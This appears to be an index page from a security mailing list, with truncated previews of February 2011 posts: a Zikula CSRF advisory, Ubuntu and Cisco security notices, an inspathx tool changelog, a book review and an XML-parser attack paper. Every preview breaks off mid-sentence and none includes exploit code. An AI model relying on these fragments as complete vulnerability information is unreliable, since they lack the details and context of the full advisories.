Zikula CMS 1.2.4 <= Cross Site Request Forgery (CSRF) Vulnerability
1. OVERVIEW
The Zikula 1.2.4 and lower versions were vulnerable to Cross Site
Request Forgery (CSRF).
2. BACKGROUND
Zik
Check the update via
svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx
CHANGELOG
===
covered remaining checks (empty array, null cookie) in
Full_Path_Disclosure
(http://www.owasp.org/index.php/Full_Path_Disclosure) of OWASP
Application Security Desk Reference (ASDR) Projec
===
Ubuntu Security Notice USN-1053-1 February 01, 2011
subversion vulnerabilities
CVE-2007-2448, CVE-2010-3315, CVE-2010-4539, CVE-2010-4644
===
A security issue affects the fol
Hi FD folks,
A short review of a new title on building a vendor product security
response and team. I think this book would prove useful for vendors
wishing to avoid the shame and humiliation of having vulns published
when they could have avoided it with a process and team in place.
https://info
Some epic's in this one as well :)
Hello all,
I am sitting in LAX right now. This last week I have been in
Venezuela and Columbia.
A small part of this trip was the dubious distinction that has
resulted from around two years of work to setup. I have spoken with
two cartels in the area.
What m
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Cisco Security Advisory: Multiple Cisco WebEx Player Vulnerabilities
Advisory ID: cisco-sa-20110201-webex
Revision 1.0
For Public Release 2011 February 1 1600 UTC (GMT
===
Ubuntu Security Notice USN-1055-1 February 01, 2011
openjdk-6, openjdk-6b18 vulnerabilities
CVE-2010-4351, CVE-2011-0025
===
A security issue affects the following Ubuntu rel
On Tue, Feb 1, 2011 at 5:55 PM, HI-TECH . <
isowarez.isowarez.isowa...@googlemail.com> wrote:
> Hello lists,
>
> the paper included in this email discusses as the subject describes the
> issues of XML Parsers and how they can be exploited in a web
> application environment.
> >From the Preface:
>
